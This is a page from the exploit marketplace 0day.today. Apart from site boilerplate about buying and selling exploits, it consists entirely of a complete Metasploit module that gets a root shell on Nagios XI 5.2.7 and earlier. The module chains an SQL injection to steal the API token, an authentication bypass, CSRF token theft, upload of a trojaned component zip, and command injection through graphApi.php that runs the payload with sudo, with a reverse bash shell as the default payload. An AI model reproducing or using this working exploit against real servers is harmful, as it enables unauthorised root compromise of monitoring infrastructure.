0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Nagios XI Chained - Remote Code Execution (Metasploit)
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Nagios XI Chained Remote Code Execution', 'Description' => %q{ This module exploits an SQL injection, auth bypass, file upload, command injection, and privilege escalation in Nagios XI <= 5.2.7 to pop a root shell. }, 'Author' => [ 'Francesco Oddo', # Vulnerability discovery 'wvu' # Metasploit module ], 'References' => [ ['EDB', '39899'] ], 'DisclosureDate' => 'Mar 6 2016', 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Privileged' => true, 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd cmd_bash', 'RequiredCmd' => 'generic bash-tcp php perl python openssl gawk' } }, 'Targets' => [ ['Nagios XI <= 5.2.7', version: Gem::Version.new('5.2.7')] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash', 'LHOST' => Rex::Socket.source_address } )) end def check res = send_request_cgi!( 'method' => 'GET', 'uri' => '/nagiosxi/' ) return unless res && (html = res.get_html_document) if (version = html.at('//input[@name = "version"]/@value')) vprint_status("Nagios XI version: #{version}") if Gem::Version.new(version) <= target[:version] return CheckCode::Appears end end CheckCode::Safe end def exploit if check != CheckCode::Appears fail_with(Failure::NotVulnerable, 'Vulnerable version not found! punt!') end print_status('Getting API token') get_api_token print_status('Getting admin cookie') get_admin_cookie print_status('Getting monitored host') get_monitored_host print_status('Downloading component') download_profile_component print_status('Uploading root shell') upload_root_shell print_status('Popping shell!') pop_dat_shell end # # Cleanup methods # def on_new_session(session) super print_status('Cleaning up...') commands = [ 'rm -rf ../profile', 'unzip -qd .. ../../../../tmp/component-profile.zip', 'chown -R nagios:nagios ../profile', "rm -f ../../../../tmp/component-#{zip_filename}" ] commands.each do |command| vprint_status(command) session.shell_command_token(command) end end # # Exploit methods # def get_api_token res = send_request_cgi( 'method' => 'GET', 'uri' => '/nagiosxi/includes/components/nagiosim/nagiosim.php', 'vars_get' => { 'mode' => 'resolve', 'host' => '\'AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((' \ 'SELECT backend_ticket FROM xi_users WHERE user_id=1' \ '),FLOOR(RAND(0)*2))x ' \ 'FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- ' } ) if res && res.body =~ /Duplicate entry '(.*?).'/ @api_token = $1 vprint_good("API token: #{@api_token}") else fail_with(Failure::UnexpectedReply, 'API token not found! punt!') end end def get_admin_cookie res = send_request_cgi( 'method' => 'GET', 'uri' => '/nagiosxi/rr.php', 'vars_get' => { 'uid' => "1-#{Rex::Text.rand_text_alpha(8)}-" + Digest::MD5.hexdigest(@api_token) } ) if res && (@admin_cookie = res.get_cookies.split('; ').last) vprint_good("Admin cookie: #{@admin_cookie}") get_csrf_token(res.body) else fail_with(Failure::NoAccess, 'Admin cookie not found! punt!') end end def get_csrf_token(body) if body =~ /nsp_str = "(.*?)"/ @csrf_token = $1 vprint_good("CSRF token: #{@csrf_token}") else fail_with(Failure::UnexpectedReply, 'CSRF token not found! punt!') end end def get_monitored_host res = send_request_cgi( 'method' => 'GET', 'uri' => '/nagiosxi/ajaxhelper.php', 'cookie' => @admin_cookie, 'vars_get' => { 'cmd' => 'getxicoreajax', 'opts' => '{"func":"get_hoststatus_table"}', 'nsp' => @csrf_token } ) return unless res && (html = res.get_html_document) if (@monitored_host = html.at('//div[@class = "hostname"]/a/text()')) vprint_good("Monitored host: #{@monitored_host}") else fail_with(Failure::UnexpectedReply, 'Monitored host not found! punt!') end end def download_profile_component res = send_request_cgi( 'method' => 'GET', 'uri' => '/nagiosxi/admin/components.php', 'cookie' => @admin_cookie, 'vars_get' => { 'download' => 'profile' } ) if res && res.body =~ /^PK\x03\x04/ @profile_component = res.body else fail_with(Failure::UnexpectedReply, 'Failed to download component! punt!') end end def upload_root_shell mime = Rex::MIME::Message.new mime.add_part(@csrf_token, nil, nil, 'form-data; name="nsp"') mime.add_part('1', nil, nil, 'form-data; name="upload"') mime.add_part('1000000', nil, nil, 'form-data; name="MAX_FILE_SIZE"') mime.add_part(payload_zip, 'application/zip', 'binary', 'form-data; name="uploadedfile"; ' \ "filename=\"#{zip_filename}\"") res = send_request_cgi!( 'method' => 'POST', 'uri' => '/nagiosxi/admin/components.php', 'cookie' => @admin_cookie, 'ctype' => "multipart/form-data; boundary=#{mime.bound}", 'data' => mime.to_s ) if res && res.code != 200 if res.redirect? && res.redirection.path == '/nagiosxi/install.php' vprint_warning('Nagios XI not configured') else fail_with(Failure::PayloadFailed, 'Failed to upload root shell! punt!') end end end def pop_dat_shell send_request_cgi( 'method' => 'GET', 'uri' => '/nagiosxi/includes/components/perfdata/graphApi.php', 'cookie' => @admin_cookie, 'vars_get' => { 'host' => @monitored_host, 'end' => ';sudo ../profile/getprofile.sh #' } ) end # # Support methods # def payload_zip zip = Rex::Zip::Archive.new Zip::File.open_buffer(@profile_component) do |z| z.each do |f| zip.entries << Rex::Zip::Entry.new( f.name, (if f.ftype == :file if f.name == 'profile/getprofile.sh' payload.encoded else z.read(f) end else '' end), Rex::Zip::CM_DEFLATE, nil, (Rex::Zip::EFA_ISDIR if f.ftype == :directory) ) end end zip.pack end # # Utility methods # def zip_filename @zip_filename ||= Rex::Text.rand_text_alpha(8) + '.zip' end end # 0day.today [2024-05-20] #